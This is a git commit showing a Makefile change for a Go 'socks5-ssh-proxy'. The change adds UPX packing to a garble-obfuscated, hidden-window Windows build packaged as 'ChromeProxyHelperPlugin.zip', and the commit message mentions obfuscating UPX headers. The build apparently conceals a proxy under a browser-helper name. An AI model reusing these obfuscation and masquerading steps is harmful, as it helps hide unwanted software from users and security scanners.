Add some development research notes and obfuscate two other headers in the UPX packed file

This commit is contained in:
2024-07-28 20:43:52 +02:00
parent 2758725549
commit 31d5239e00
4 changed files with 52 additions and 17 deletions

View File

@ -21,6 +21,7 @@ socks5-ssh-proxy.release: resources $(SOURCES) $(GARBLE_BIN)
win: socks5-ssh-proxy.exe
socks5-ssh-proxy.exe: resources $(GARBLE_BIN) $(SOURCES)
GOOS=windows GOARCH=amd64 $(GARBLE_CMD) build -ldflags -H=windowsgui -tags release -o $@
upx $@
goreleaser: resources $(GARBLE_BIN)
goreleaser build --clean --snapshot --id win-release
win-package: ChromeProxyHelperPlugin.zip